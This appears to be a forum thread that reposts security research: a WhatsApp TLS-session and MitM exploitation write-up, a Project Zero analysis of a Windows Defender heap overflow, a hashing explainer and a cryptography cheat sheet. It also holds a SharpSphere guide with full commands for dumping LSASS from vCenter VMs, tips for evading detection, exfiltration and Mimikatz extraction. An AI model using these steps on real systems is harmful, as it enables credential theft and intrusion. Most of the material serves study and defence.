Even though the exact mechanics leading to this action are not known to the author, a quick visit to the above location shows that this URL hosts a JSON file holding information on WhatsApp sticker packs. It turns out that a method we have named openStickerConnection() (defined in class X.2kz) is responsible for connecting to this URL and downloading the response. Here's what it looks like:

public final ETagAndStickerPacksBundle openStickerConnection(String url, String etag) {
    HttpsURLConnection httpsURLConnection;
    ... 
    // (1)
    httpsURLConnection = new URL(url).openConnection();
    httpsURLConnection.setSSLSocketFactory(this.A06.getMediaExternalSSLCacheEnabledSSLSocketFactory());
    httpsURLConnection.setRequestProperty("User-Agent", this.A07.getUserAgent());
    httpsURLConnection.setConnectTimeout(15000);
    httpsURLConnection.setReadTimeout(30000);
    httpsURLConnection.setRequestMethod("GET");
    ...
    int responseCode = httpsURLConnection.getResponseCode();
    if(responseCode == 200) {
        ...
        InputStream inputStream = httpsURLConnection.getInputStream();
        // (2)
        String json = C27551It.readAllFromInputStream(inputStream);
        AssertUtil.assertNotNull(json);
        JSONArray jSONArray = new JSONArray(json);
        ...
    }
    ...
}

At (1) WhatsApp initiates an HTTP connection to the given URL. One thing to note here is that the connection's SSLSocketFactory is set to the return value of getMediaExternalSSLCacheEnabledSSLSocketFactory(). The latter returns an instance of the TLS 1.2 SSL factory that stores TLS sessions in the device's external storage and, thus, it is possible for an attacker to intercept this connection. Later on, at (2), one can see that once an input stream has been opened, WhatsApp uses readAllFromInputStream() of class X.1It to read the whole response into a single string buffer, no matter how large the latter is. For completeness, the code of readAllFromInputStream() is shown below:

public static String readAllFromInputStream(InputStream inputStream) {
    char[] buf = new char[8192];
    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
    StringWriter stringWriter = new StringWriter();
    while(true) {
        int read = bufferedReader.read(buf);
        if(read < 0) {
            bufferedReader.close();
            return stringWriter.toString();
        } else if(!Thread.currentThread().isInterrupted()) {
            stringWriter.write(buf, 0, read);
        } else {
            throw new InterruptedIOException();
        }
    }
}

Sending an arbitrarily large response to the client will eventually trigger an Out-Of-Memory (OOM) condition. 
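The unbounded accumulation above is the crux of the issue: memory use grows with the attacker-controlled response size. A minimal Python rendition of the same read loop, together with a size-capped variant of the kind that would have prevented the remote OOM trigger:

```python
import io

CHUNK = 8192

def read_all(stream) -> str:
    """Mirror of readAllFromInputStream: accumulate with no upper bound."""
    out = io.StringIO()
    while True:
        chunk = stream.read(CHUNK)
        if not chunk:
            return out.getvalue()
        out.write(chunk)  # buffer grows with the response, unchecked

def read_bounded(stream, limit: int) -> str:
    """Defensive variant: refuse responses larger than `limit` characters."""
    out = io.StringIO()
    total = 0
    while True:
        chunk = stream.read(CHUNK)
        if not chunk:
            return out.getvalue()
        total += len(chunk)
        if total > limit:
            raise ValueError("response exceeds size limit")
        out.write(chunk)
```

A cap chosen just above the largest legitimate sticker-pack JSON would neutralize the attack without affecting normal operation.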
Furthermore, to avoid sending large amounts of data and to trigger the OOM faster, an attacker can use gzip content encoding. Once an OutOfMemoryError is thrown, WhatsApp's custom exception handler will be called to handle the situation. System information will be collected, and the upload process will be triggered. Intercepting the connection will disclose all the sensitive information that was intended to be sent to WhatsApp's internal infrastructure. The following image shows what a successful attack looks like:

The screenshot above shows a tmux session. The window on the left shows the output of openssl_http_pipe.py (found under tls12_psk_extract/), a tool that forks a modified OpenSSL s_server instance and communicates with it over a pipe, in order to allow a user to handle HTTP requests manually. The lines at the very bottom show the POST request that WhatsApp issues in order to upload the heap data. In our case, around 4 MB of data has been grabbed. The window on the right shows a brief overview of this data. It can be seen that it is actually part of a multipart request, corresponding to a file named dump.gz. The latter's contents are not shown here in full, as they contain cryptographic material of an actual WhatsApp account.

The tooling required for this attack can be found in the PoC's tls12_psk_extract/ directory. Detailed instructions for setting up the MitM environment can be found in README.md in the same directory.

Conclusion and future work

This blog post demonstrated the potential of exploiting man-in-the-disk (MitD) vulnerabilities using remote vectors. More specifically, TLS session secrets of WhatsApp were found to be stored erroneously in an unprotected directory. These were collected remotely through the exploitation of a vulnerability in an Android component (CVE-2020-6516, a Same-Origin-Policy bypass bug of Chrome). 
Of course, the collection of secrets could also have been achieved through the introduction of a malicious application on the victim's device. Once the TLS session secrets were collected, it was possible to perform a man-in-the-middle attack on WhatsApp communications. This attack allowed the attacker to execute arbitrary code on the victim's device. Moreover, it allowed for the collection of the victim user's Noise protocol cryptographic material, which could later be used for the decryption of user communications.

The introduction of Scoped Storage in Android greatly limits the impact of man-in-the-disk vulnerabilities. Android 11 is the first version of Android to fully enforce scoped storage, allowing apps to access by default only their own resources on external storage. CENSUS strongly recommends that users make sure they are using WhatsApp version 2.21.4.18 or greater on the Android platform, as previous versions are vulnerable to the aforementioned bugs and may allow for remote user surveillance. CENSUS has tracked the TLS 1.2 man-in-the-disk vulnerability under CVE-2021-24027 [33].

There are many more subsystems in WhatsApp which might be of great interest to an attacker. The communication with upstream servers and the E2E encryption implementation are two notable ones. Additionally, despite the fact that this work focused on WhatsApp, other popular Android messaging applications (e.g. Viber, Facebook Messenger), or even mobile games, might be unwittingly exposing a similar attack surface to remote adversaries.
References

[01] https://blog.checkpoint.com/2018/08/12/man-in-the-disk-a-new-attack-surface-for-android-apps/
[02] https://bugs.chromium.org/p/chromium/issues/detail?id=1092449
[03] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6516
[04] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24027
[05] http://www.noiseprotocol.org/
[06] https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/
[07] https://www.washingtonpost.com/technology/2019/10/29/whatsapp-accuses-israeli-firm-helping-governments-hack-phones-journalists-human-rights-workers/
[08] https://github.com/skylot/jadx
[09] https://developer.android.com/guide/topics/providers/content-providers
[10] https://developer.android.com/guide/topics/manifest/provider-element
[11] https://android.googlesource.com/platform/frameworks/base/+/962fb40991f15be4f688d960aa00073683ebdd20%5E%21/#F0
[12] https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy
[13] https://developer.android.com/about/versions/10/privacy/changes#scoped-storage
[14] https://chromium.googlesource.com/chromium/src/+/c6e232163d52e4334f7227ef30634b707e44a903%5E%21/#F4
[15] https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API
[16] http://phrack.org/issues/69/13.html
[17] https://tools.ietf.org/html/rfc8446
[18] https://developer.android.com/reference/javax/net/ssl/X509TrustManager
[19] https://tools.ietf.org/html/rfc5077
[20] https://www.openssl.org/docs/man1.1.1/man3/SSL_set_psk_find_session_callback.html
[21] https://tools.ietf.org/html/rfc5246
[22] https://tools.ietf.org/html/rfc7627
[23] https://www.whatsapp.com/security/WhatsApp-Security-Whitepaper.pdf
[24] https://threatpost.com/researchers-find-ssl-problems-in-whatsapp/104411/
[25] http://aosp.opersys.com/xref/android-10.0.0_r47/xref/external/conscrypt/repackaged/common/src/main/java/com/android/org/conscrypt/FileClientSessionCache.java#44
[26] https://docs.oracle.com/javase/7/docs/api/javax/net/ssl/SSLSocket.html#startHandshake()
[27] https://docs.oracle.com/javase/7/docs/api/javax/net/ssl/SSLSessionContext.html#getSession(byte[])
[28] https://developer.android.com/reference/android/net/SSLSessionCache
[29] https://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/
[30] https://blog.talosintelligence.com/2019/04/seaturtle.html
[31] https://github.com/facebook/SoLoader
[32] https://twitter.com/Shiftreduce/status/1347546599384346624/photo/1
[33] WhatsApp Exposure of TLS 1.2 Cryptographic Material to Third Party Apps (CVE-2021-24027)
[34] WhatsApp for Android
[35] https://www.appbrain.com/stats/top-android-sdk-versions
[36] READ_EXTERNAL_STORAGE permission in Android apps
[37] https://github.com/CENSUS/whatsapp-mitd-mitm

Sursa: https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/
  19. Dumping LSASS with SharpSphere

The dump function of SharpSphere allows operators to dump LSASS from any powered-on VM managed by vCenter or ESXi, without needing to authenticate to the guest OS and without needing VMware Tools to be installed. This technique is not new and has been around for many years:

https://danielsauder.com/2016/02/06/memdumps-volatility-mimikatz-vms-part-6-vmware-workstation/
https://web.archive.org/web/20210204072538/https://www.remkoweijnen.nl/blog/2013/11/25/dumping-passwords-in-a-vmware-vmem-file/

although until now it has been very difficult to leverage operationally. At its core, the process is:

1. Authenticate to vCenter/ESXi
2. Create a snapshot, with memory, of a powered-on target VM
3. Download the (often very large) .vmem and .vmsn files from the datastore
4. Either run them through Volatility, or convert to .dmp with vmss2core and run through WinDbg with Mimikatz

Arguments

Z:\>SharpSphere.exe dump --help
SharpSphere 1.0.0.0
Copyright © 2020

  --url            Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk
  --username       Required. vCenter username, i.e. administrator@vsphere.local
  --password       Required. vCenter password
  --targetvm       Required. VM to snapshot
  --snapshot       (Default: false) WARNING: Creates and then deletes a snapshot. If unset, SharpSphere will only extract memory from the last existing snapshot, or none if no snapshots are available.
  --destination    Required. Full path to the local directory where the file should be downloaded
  --help           Display this help screen.
  --version        Display version information.

--snapshot

By default, SharpSphere will not attempt to create a snapshot and will instead attempt to find valid .vmem and .vmsn files from an existing snapshot. This is preferable from an OpSec perspective because there will be no evidence in the UI; however, it is obviously not guaranteed that a particular target VM has any snapshots, or that those snapshots also captured the VM's memory. If no existing snapshot exists, SharpSphere will exit.
With --snapshot specified, SharpSphere will create a snapshot called System Backup [TIMESTAMP], download its associated .vmem and .vmsn files, and then delete the snapshot once finished. Both the creation and deletion of the snapshot will be visible to other users in the Recent Tasks window. It is possible to try first without --snapshot to see if existing snapshots exist, and then repeat with --snapshot specified if none do.

--destination

SharpSphere needs to download two files from the snapshot: a large .vmem file that is equal in size to the amount of RAM assigned to the machine (i.e. 4GB, 8GB, 16GB etc.), and a much smaller .vmsn file. It downloads these files to the directory specified by --destination on the executing machine. When running through Cobalt Strike's execute-assembly this is a directory on the beacon machine's filesystem. This is an important distinction to make because your target user is likely on an internal network and the download should therefore be relatively quick, as opposed to having to download these files over your beacon's proxy. Once the two files are downloaded, SharpSphere adds both to a zip file with a random name and then deletes them. This makes the resultant file marginally easier to exfiltrate; for example, during testing a 4GB .vmem file resulted in an 800MB zip.

Instructions

Execute SharpSphere with the following arguments (hint: get the VM name with list):

SharpSphere.exe dump --url https://[IP or FQDN]/sdk --username [USERNAME] --password [PASSWORD] --targetvm [NAME OF VM] --destination [LOCATION TO DOWNLOAD FILES]

Example Output

C:\Users\Administrator\Desktop>SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public"
[x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates
[x] Creating vSphere API interface, takes a few minutes...
[x] Connected to VMware vCenter Server 7.0.1 build-17005016
[x] Successfully authenticated
[x] Finding existing snapshots for Windows 10...
Error: No existing snapshots found for the VM Windows 10, recommend you try again with --snapshot set

If no snapshots exist, repeat the same command and include --snapshot:

SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public" --snapshot
[x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates
[x] Creating vSphere API interface, takes a few minutes...
[x] Connected to VMware vCenter Server 7.0.1 build-17005016
[x] Successfully authenticated
[x] Creating snapshot for VM Windows 10...
[x] Snapshot created successfully
[x] Downloading Windows 10-Snapshot51.vmem (4096MB) to C:\Users\Public\z53dqmxx.5bz...
[x] Downloading Windows 10-Snapshot51.vmsn to C:\Users\Public\hwu5gv2d.ezv...
[x] Download complete, zipping up so it's easier to exfiltrate...
[x] Zipping complete, download C:\Users\Public\cec0kwgk.b2m (916MB), rename to .zip, and follow instructions to use with Mimikatz
[x] Deleting the snapshot we created

If your C2 infrastructure and bandwidth support it, download the resultant zip to your attacker-controlled machine. Alternatively, and less OpSec-safe, upload the necessary tools to the beacon machine, with the understanding that these tools may be flagged as suspicious. The rest of the instructions assumes you've managed to get the file back to your machine.

Rename the random file, in this instance cec0kwgk.b2m, to a zip file and then extract the two files. The larger one is your .vmem file. Download vmss2core and provide it first with the smaller .vmsn file and then the larger .vmem file.
If the target VM is Microsoft Windows 8/8.1, Windows Server 2012, Windows Server 2016 or Windows Server 2019, execute with -W8:

vmss2core-sb-8456865.exe -W8 hwu5gv2d.ezv z53dqmxx.5bz

Otherwise use -W:

vmss2core-sb-8456865.exe -W hwu5gv2d.ezv z53dqmxx.5bz

Download WinDbg and load the resultant .dmp file that vmss2core generated as a Crash Dump. Download Mimikatz and load mimilib.dll from within WinDbg:

.load C:\Tools\Mimikatz\x64\mimilib.dll

Find the LSASS process:

!process 0 0 lsass.exe

Switch to that process:

.process /r /p ffffc70462d020c0

Profit:

!mimikatz

Written on February 26, 2021
Sursa: https://jamescoote.co.uk/Dumping-LSASS-with-SharpShere/
  20. CVE-2021-1647: Windows Defender mpengine remote code execution

Maddie Stone

The Basics

Disclosure or Patch Date: 12 January 2021
Product: Microsoft Windows Defender
Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647
Affected Versions: Version 1.1.17600.5 and previous
First Patched Version: Version 1.1.17700.4
Issue/Bug Report: N/A
Patch CL: N/A
Bug-Introducing CL: N/A
Reporter(s): Anonymous

The Code

Proof-of-concept:
Exploit sample: 6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788
Did you have access to the exploit sample when doing the analysis? Yes

The Vulnerability

Bug class: Heap buffer overflow

Vulnerability details: There is a heap buffer overflow when Windows Defender (mpengine.dll) processes the section table when unpacking an ASProtect-packed executable. Each section entry has two values: the virtual address and the size of the section. The code in CAsprotectDLLAndVersion::RetrieveVersionInfoAndCreateObjects only checks whether the next section entry's address is lower than the previous one, not whether they are equal. This means that with a section table such as the one used in this exploit sample, [ (0,0), (0,0), (0x2000,0), (0x2000,0x3000) ], 0 bytes are allocated for the section at address 0x2000, but when the code sees the next entry at 0x2000, it simply skips over it without exiting or updating the size of the section. 0x3000 bytes will then be copied to that section during decompression, leading to the heap buffer overflow.

if ( next_sect_addr > sect_addr )  // current va is greater than prev (not also eq)
{
    sect_addr = next_sect_addr;
    sect_sz = (next_sect_sz + 0xFFF) & 0xFFFFF000;
}
// if next_sect_addr <= sect_addr we continue on to next entry in the table
[...]
new_sect_alloc = operator new[](sect_sz + sect_addr);  // allocate new section
[...]
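The effect of the missing equality check can be simulated in a few lines. This is an illustrative Python model of the loop's size computation, not the actual mpengine code:

```python
def simulate(section_table):
    """Model the vulnerable logic: entries whose address equals the previous
    one are skipped without growing the allocation size."""
    sect_addr = 0
    sect_sz = 0
    for next_addr, next_sz in section_table:
        if next_addr > sect_addr:           # '>' instead of '>=': equal addresses fall through
            sect_addr = next_addr
            sect_sz = (next_sz + 0xFFF) & 0xFFFFF000
    allocated = sect_addr + sect_sz         # size passed to operator new[]
    # Bytes the decompressor will actually write: the furthest section end.
    copied = max((a + s for a, s in section_table), default=0)
    return allocated, copied

# The section table from the exploit sample
allocated, copied = simulate([(0, 0), (0, 0), (0x2000, 0), (0x2000, 0x3000)])
print(hex(allocated), hex(copied))  # 0x2000 allocated, 0x5000 written: heap overflow
```

With the patched comparison (erroring out on an address less than or equal to the previous one), this table would be rejected before any allocation.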
Patch analysis: There are quite a few changes to the function CAsprotectDLLAndVersion::RetrieveVersionInfoAndCreateObjects between version 1.1.17600.5 (vulnerable) and 1.1.17700.4 (patched). The directly related change was to add an else branch to the comparison, so that if any entry in the section array has an address less than or equal to the previous entry, the code will error out and exit rather than continue to decompress.

Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.): It seems possible that this vulnerability was found through fuzzing or manual code review. If the ASProtect unpacking code was included from an external library, that would have made the process of finding this vulnerability even more straightforward for both fuzzing and review.

(Historical/present/future) context of bug:

The Exploit

(The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.)

Exploit strategy (or strategies):

1. The heap buffer overflow is used to overwrite the data in an object stored as the first field in the lfind_switch object, which is allocated in the lfind_switch::switch_out function. The two fields that were overwritten in the object pointed to by the lfind_switch object are used as indices in lfind_switch::switch_in. Due to no bounds checking on these indices, another out-of-bounds write can occur.
2. The out-of-bounds write in step 1 performs an 'or' operation on the field in the VMM_context_t struct (the virtual memory manager within Windows Defender) that stores the length of a table tracking the virtually mapped pages. This field usually equals the number of pages mapped * 2.
3. By performing the 'or' operation, the value in that field is increased (for example, from 0x0000000C to 0x0003030C). When it is increased, it allows for an additional out-of-bounds read and write, used for modifying the memory-management struct to allow for arbitrary r/w.
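The 'or' trick works because OR can only set bits, never clear them, so the attacker can only enlarge the length field. Illustrative arithmetic using the values from the write-up (the OR mask here is a hypothetical value chosen to reproduce the documented before/after):

```python
pages_mapped = 6
table_len = pages_mapped * 2        # 0x0000000C, as described in the write-up

attacker_or_mask = 0x00030300       # hypothetical out-of-bounds OR value
table_len |= attacker_or_mask       # OR sets bits, so the field can only grow

print(hex(table_len))  # 0x3030c -- strictly larger, enabling further OOB r/w
```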
Exploit flow: The exploit uses "primitive bootstrapping": the original buffer overflow is used to cause two additional out-of-bounds writes and ultimately gain arbitrary read/write.

Known cases of the same exploit flow: Unknown.

Part of an exploit chain? Unknown.

The Next Steps

Variant analysis

Areas/approach for variant analysis (and why):
Review the ASProtect unpacker for additional parsing bugs.
Review and/or fuzz other unpacking code for parsing and memory issues.

Found variants: N/A

Structural improvements

What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?

Ideas to kill the bug class: Building mpengine.dll with ASAN enabled should allow this bug class to be caught. Open-sourcing the unpackers could allow more folks to find issues in this code, which could potentially detect issues like this more readily.

Ideas to mitigate the exploit flow: Add bounds checking wherever indices are used. For example, if there had been bounds checking on the indices used in lfind_switch::switch_in, it would have prevented the second out-of-bounds write which allowed this exploit to modify the VMM_context_t structure.

Other potential improvements: It appears that by default the Windows Defender emulator runs outside of a sandbox. In 2018, an article announced that Windows Defender Antivirus can now run in a sandbox. The article states that when sandboxing is enabled, you will see a content process MsMpEngCp.exe running in addition to MsMpEng.exe. By default, on Windows 10 machines, only MsMpEng.exe runs, as SYSTEM. Sandboxing the anti-malware emulator by default would make this vulnerability more difficult to exploit, because a sandbox escape would then be required in addition to this vulnerability.

0-day detection methods

What are potential detection methods for similar 0-days?
Meaning, are there any ideas of how this exploit or similar exploits could be detected as a 0-day? Detecting these types of 0-days will be difficult, as the sample simply drops a new file with the characteristics needed to trigger the vulnerability, such as a section table that includes the same virtual address twice. The exploit method also did not require anything that especially stands out.

Other References

February 2021: 浅析 CVE-2021-1647 的漏洞利用技巧 ("Analysis of CVE-2021-1647 vulnerability exploitation techniques") by Threatbook

Sursa: https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1647.html
  21. Don't forget: this weekend, CTF, prizes! https://ctf.rstforums.com/ If anyone can still contribute exercises, not too difficult ones, that would be perfect.
  22. I booked my appointment at Romexpo when there were still 3000 people on the waiting list. And I think I was able to get an appointment after about 2 weeks.
  23. I'm not preparing to give any order, you're blatantly lying to people. As for losing the belly fat, I keep trying but can't manage it... Maybe those who give the order can also give me some tips on getting rid of my belly.
  24. Hi,

SHA256/SHA512 etc. cannot be reversed because they are hashing algorithms. For example, the sha256 hash for the text "Gigel" is:

38810d5f65b12d1433aaff068818bc1f298a322b2a45a8f335645c8fe3af3510

A hash for the longer Romanian text "Gigel se duce la plimbare si vede o fata de care se indragosteste apoi uita de ea cand vede un Lamborghini si gaseste 10 RON pe jos" is:

299c91444f0f7f8ee3cf12ffc4a9483bc1caf5f43f68b0593b1dddd84a0b44be

As you can see, regardless of the length of the text, the length of the hash is the same. Whether the text (or binary) is 1 KB or 2 TB, the hash will have the same length and will always be the same for the same input. This is why hashes are used to avoid storing passwords in plain text in a database.

To take a simpler example: the CNP (Romanian personal numeric code). It encodes the sex, birth date, county ... and the last digit is a "control sum". The exact algorithm is described here: https://ro.wikipedia.org/wiki/Cod_numeric_personal_(România) - that is how the last digit is computed. But let's take an even simpler example: say that for the CNP 1881111111116 the control sum is the final digit "6", and that it is computed just by adding up the digits and taking the remainder of division by 10 (i.e. %10). A hash is, conceptually, something similar: it corresponds to that final "6". Can you deduce the CNP from that "6"? Clearly not.

The only thing you can do against hashes is brute force, which can be optimized because of certain "problems" in the hash algorithms. That is, hashing every combination of text: aaaaaa, aaaaab, aaaaac etc. until you reach the desired hash. The discussion could go on much longer.
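The two ideas from the post — fixed-length output regardless of input size, and a lossy "control digit" from which the input cannot be recovered — can be checked directly in Python (the mod-10 rule below is the post's simplified example, not the real CNP algorithm):

```python
import hashlib

# Same algorithm, wildly different input sizes: the digest length never changes.
short = hashlib.sha256(b"Gigel").hexdigest()
long_ = hashlib.sha256(b"x" * 1_000_000).hexdigest()
print(len(short), len(long_))  # both 64 hex characters (256 bits)

# The simplified CNP-style "control sum" from the post: sum of digits mod 10.
def control_digit(cnp_without_last):
    return sum(int(d) for d in cnp_without_last) % 10

print(control_digit("188111111111"))  # 6 -- the full CNP cannot be recovered from it
```

Many different 12-digit strings map to the same control digit, which is exactly why the mapping cannot be inverted — the same argument, scaled up, applies to a 256-bit hash.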
  25. CRYPTOGRAPHY CHEAT SHEET FOR BEGINNERS

1 What is cryptography?

Cryptography is a collection of techniques for:
- concealing data transmitted over insecure channels
- validating message integrity and authenticity

2 Some cryptographic terms

plaintext – a message or other data in readable form
ciphertext – a message concealed for transmission or storage
encryption – transforming plaintext into ciphertext
decryption – transforming ciphertext back into plaintext
key – an input to an encryption or decryption algorithm that determines the specific transformation applied
hash – the output of an algorithm that produces a fixed N-bit output from any input of any size
entropy – the number of possible states of a system, or the number of bits in the shortest possible description of a quantity of data. This may be less than the size of the data if it is highly redundant.

3 Basic cryptographic algorithms

3.1 symmetric ciphers

A symmetric cipher uses the same key for encryption and decryption. In semi-mathematical terms:

encryption: ciphertext = E(plaintext, key)
decryption: plaintext = D(ciphertext, key)

Two parties that want to communicate via encryption must agree on a particular key to use, and sharing and protecting that key is often the most difficult part of protecting encryption security. The number of possible keys should be large enough that a third party can't feasibly try all of the keys ("brute-forcing") to see if one of them decrypts a message.

3.2 block ciphers

A block cipher works on fixed-size units of plaintext to produce (usually) identically-sized units of ciphertext, or vice-versa.
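The E(plaintext, key) / D(ciphertext, key) round-trip from section 3.1 can be demonstrated with the simplest possible symmetric construction, a repeating-key XOR (a toy for illustration only, trivially breakable, not a real block or stream cipher):

```python
def xor_cipher(data: bytes, key: bytes) -> bytes:
    """XOR is its own inverse, so the same function is both E and D."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

plaintext = b"attack at dawn"
key = b"secret"

ciphertext = xor_cipher(plaintext, key)   # ciphertext = E(plaintext, key)
recovered = xor_cipher(ciphertext, key)   # plaintext  = D(ciphertext, key)

print(ciphertext.hex())
print(recovered == plaintext)  # True: same key reverses the transformation
```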
Example block ciphers:
- DES (the former Data Encryption Standard) with a 64-bit block and 56-bit keys, now obsolete because both the block size and key size are too small and allow for easy brute-forcing
- AES (Advanced Encryption Standard, formerly known as Rijndael) with 128-bit blocks and keys of 128, 192, or 256 bits

3.3 stream ciphers

A stream cipher produces a stream of random bits based on a key that can be combined (usually using XOR) with data for encryption or decryption.

Example stream ciphers:
- Chacha20
- RC4 (now considered too weak to use)

3.4 public-key (or asymmetric) ciphers

A public-key cipher has two complementary keys K1 and K2 such that one can reverse what the other one does, or in symbolic terms:

ciphertext = E(plaintext, K1) or E(plaintext, K2)
plaintext = D(ciphertext, K2) or D(ciphertext, K1)

Unlike a symmetric cipher, where the key must be kept secret between parties at all times, a public-key algorithm allows one (but only one!) of the keys to be revealed in public, making it possible to send encrypted messages without having previously arranged to share a key.

Example public-key algorithms:
- RSA (from the initials of its creators Rivest, Shamir, Adleman), based on modular arithmetic using large prime numbers and the difficulty of factoring large numbers. At this time 2048-bit primes are considered necessary to create secure RSA keys (factorization of keys based on 512-bit primes has already been demonstrated and 1024-bit keys appear feasible).
- Elliptic curve algorithms, based on integers and modular arithmetic satisfying an equation of the form y^2 = x^3 + a*x + b. Elliptic curve keys can be much shorter (256-bit EC keys are considered roughly equivalent to 3072-bit RSA keys).

However, public-key algorithms are much (hundreds to thousands of times) slower than symmetric algorithms, making it expensive to send large amounts of data using only public-key encryption.
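The modular arithmetic behind RSA can be sketched with deliberately tiny primes (trivially factorable, for illustration only; as noted above, real keys use 2048-bit primes, and real implementations also add padding):

```python
# Toy RSA key generation with tiny, insecure primes.
p, q = 61, 53
n = p * q                     # 3233, the public modulus
phi = (p - 1) * (q - 1)       # 3120
e = 17                        # public exponent, coprime with phi
d = pow(e, -1, phi)           # private exponent (modular inverse of e)

message = 65                  # a message encoded as an integer below n
ciphertext = pow(message, e, n)    # encrypt with the public key (e, n)
recovered = pow(ciphertext, d, n)  # decrypt with the private key (d, n)

print(ciphertext, recovered)
print(recovered == message)   # True: the keys reverse each other
```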
However, public-key algorithms do provide a secure way to transmit symmetric cipher keys.

3.5 Diffie-Hellman key exchange

An algorithm that allows two parties to create a shared secret through a public exchange from which an eavesdropper cannot feasibly infer the secret. Useful for establishing a shared symmetric key for encrypted communication. Diffie-Hellman can be performed using either modular arithmetic with large prime numbers or elliptic-curve fields.

Diffie-Hellman is also usually the basis of "forward secrecy". One method of key exchange possible in SSL/TLS is simply using a public-key algorithm to send a key between a client and a server. However, if the private key of that SSL/TLS certificate is later exposed, someone who monitored and recorded session traffic could decrypt all the keys used in the sessions they recorded. Forward secrecy not only involves setting up unique, random session keys for each communication session, but also using an algorithm like Diffie-Hellman which establishes those keys in a way that is inaccessible to an eavesdropper.

3.6 hash algorithms

A hash (or cryptographic checksum) reduces input data (of any size) to a fixed-size N-bit value. In particular, for cryptographic use a hash has these properties:
- two different inputs are very unlikely to produce the same hash ("collision")
- it should be very difficult to find another input that produces any specified hash value ("preimage")
- even a one-bit change in the input should produce a hash that is different in about N/2 bits

Note that because the possible number of inputs to a hash function is much larger than the hash function output, there is always some small probability of collision or of finding a preimage. In the ideal case an N-bit hash has a 2^-(N/2) probability of collision for two randomly-chosen large inputs (look up the "birthday problem" for why it is N/2 and not N), and a 2^-N probability of a random input producing a specified hash value.
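The "one-bit change flips about N/2 output bits" property just listed can be observed directly with SHA-256 from Python's standard library:

```python
import hashlib

def bit_diff(a: bytes, b: bytes) -> int:
    """Number of differing bits between two equal-length byte strings."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))

h1 = hashlib.sha256(b"\x00").digest()
h2 = hashlib.sha256(b"\x01").digest()  # the input differs in a single bit

print(bit_diff(h1, h2), "of 256 bits differ")  # typically close to 128
```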
Example hash algorithms:
- MD5 produces a 128-bit hash from its input. It has demonstrated collisions and feasible preimage computation and should not be used.
- SHA1 produces 160-bit hashes but has at least one demonstrated collision and is also deprecated for cryptographic use (however, it is still used in git because it is still workable as a plain hash function).
- SHA-256 produces 256-bit hashes. SHA-224 is basically a SHA-256 hash truncated to 224 bits. Similarly, SHA-512 produces a 512-bit hash and SHA-384 truncates a SHA-512 hash to 384 bits.

3.7 cryptographic random number generators

Many cryptographic methods require producing random numbers (such as for generating unique keys or identifiers). Traditional pseudo-random number generators produce output that can be highly predictable, as well as often starting from known states and having relatively small periods (such as 2^32). A cryptographic random number generator must make it very difficult to determine the prior (or future) state of the generator from its current output, as well as have enough entropy to generate sufficiently large random numbers.

At one point the Debian maintainers made a seemingly innocuous patch to the OpenSSL random number generator initialization. The unintended consequence was that it effectively seeded the generator with only about 16 bits of entropy, meaning in particular that ssh-keygen generated only about 2^16 possible 2048-bit SSH host keys when it really should have been capable of generating over 2^2000. Once this was discovered and patched, a lot of people had to change their host keys (or risk "man-in-the-middle" impersonation attacks).

Finding useful random input to make a cryptographic random number generator truly unpredictable can be difficult. Many systems attempt to collect physically random input (such as the timing of disk I/O, network packets, or keyboard input) that is "mixed" into existing random state using a cipher or cryptographic hash.
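The predictable-vs-cryptographic distinction shows up directly in Python's standard library, which offers both a seedable PRNG (random) and a CSPRNG interface backed by the OS entropy pool (secrets):

```python
import random
import secrets

# The ordinary PRNG is deterministic: the same seed reproduces the same stream.
rng = random.Random(1234)
again = random.Random(1234)
print(rng.random() == again.random())  # True -- fine for simulations, fatal for keys

# The CSPRNG draws from the OS entropy pool and cannot be re-seeded this way.
key = secrets.token_bytes(32)          # e.g. a 256-bit symmetric key
print(len(key), secrets.token_hex(16))
```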
4 Cryptographic Protocols

The algorithms described above are building blocks for methods of secure communication. A particular combination of these basic algorithms applied in a particular way is a cryptographic protocol.

4.1 cipher modes

The simplest thing you can do with a block cipher is break plaintext up into blocks, then encrypt each block with your chosen key (also called ECB for "Electronic Code Book", by analogy with codes that simply substituted code words). Unfortunately this leads to a weakness: if a particular plaintext block is repeated in the input, the ciphertext block also repeats in the output. This can easily happen in English text if a phrase just happens to line up with a block the same way more than once.

There are other ways to use block ciphers that avoid this. The simplest is CBC or "Cipher Block Chaining", where the previous ciphertext block is XORed with the current plaintext block before encrypting it. This is reversible by decrypting a ciphertext block, then XORing the previous ciphertext block with the result to recover the plaintext. There are other modes like OFB ("Output FeedBack") that combine ciphertext and plaintext in more complicated but reversible ways so that repeated plaintext blocks won't result in repeated ciphertext blocks. These modes also often depend on an "initialization vector", typically a cryptographically random value that makes the initial state of the encryption unpredictable to an outside observer.

4.2 message signing

Someone who has created a public key pair (K1, K2) and published a public key (let's say that's K2) can encrypt a message using their private key K1, and anyone can validate that the message came from that sender by decrypting it with the public key K2. Due to the much higher computational cost of encrypting data with public-key algorithms, usually the signer actually encrypts only a cryptographic hash of the original message.
